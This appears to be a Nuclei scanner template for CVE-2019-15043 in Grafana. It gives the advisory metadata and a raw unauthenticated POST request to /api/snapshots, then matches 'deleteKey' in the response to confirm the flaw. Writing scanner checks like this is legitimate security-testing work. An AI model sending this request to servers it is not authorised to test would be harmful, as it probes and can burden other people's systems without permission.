id: CVE-2019-15043
info:
  author: bing0o
  name: Grafana unauthenticated API
  severity: high
  description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
  reference:
    - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
    - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
    - https://community.grafana.com/t/release-notes-v6-3-x/19202
  tags: cve,cve2019,grafana
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.50
    cve-id: CVE-2019-15043
    cwe-id: CWE-306

requests:
  - raw:
      - |
        POST /api/snapshots HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Content-Length: 235
        Accept: */*
        Accept-Language: en
        Content-Type: application/json

        {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}

    matchers:
      - part: body
        type: word
        words:
          - deleteKey